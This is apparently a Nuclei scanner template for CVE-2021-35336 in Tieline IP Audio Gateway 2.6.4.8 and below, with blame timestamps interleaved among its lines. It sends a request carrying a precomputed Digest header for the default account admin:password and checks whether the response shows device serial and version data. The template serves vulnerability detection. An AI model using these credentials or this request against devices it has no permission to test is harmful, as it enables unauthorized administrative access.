2021-10-30 11:17:35 +00:00
id : CVE-2021-35336
2021-07-18 20:16:22 +00:00
info :
2022-05-02 21:50:47 +00:00
name : Tieline IP Audio Gateway <=2.6.4.8 - Unauthorized Remote Admin Panel Access
2021-07-18 20:16:22 +00:00
author : Pratik Khalane
2021-08-05 07:22:50 +00:00
severity : critical
2022-05-02 21:50:47 +00:00
description : Tieline IP Audio Gateway 2.6.4.8 and below is affected by a vulnerability in the web administrative interface that could allow an unauthenticated user to access a sensitive part of the system with a high privileged account.
2021-08-19 13:59:12 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
- https://nvd.nist.gov/vuln/detail/CVE-2021-35336
2021-10-30 11:41:59 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-10-30 11:41:59 +00:00
cve-id : CVE-2021-35336
cwe-id : CWE-863
2023-04-12 10:55:48 +00:00
epss-score : 0.05836
2022-04-22 10:38:41 +00:00
tags : cve,cve2021,tieline,default-login
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-07-18 20:16:22 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-18 20:16:22 +00:00
- method : GET
path :
- '{{BaseURL}}/api/get_device_details'
headers :
Referer : '{{BaseURL}}/assets/base/home.html'
Authorization : 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"'
2021-09-08 12:17:19 +00:00
# admin:password
2021-08-04 16:41:10 +00:00
2021-07-18 20:16:22 +00:00
matchers-condition : and
matchers :
- type : word
words :
- "<SERIAL>"
- "<VERSION>"
condition : and
- type : word
words :
- "text/xml"
part : header
- type : status
status :
2021-08-04 16:34:06 +00:00
- 200
2022-05-02 21:50:47 +00:00
# Enhanced by mp on 2022/05/02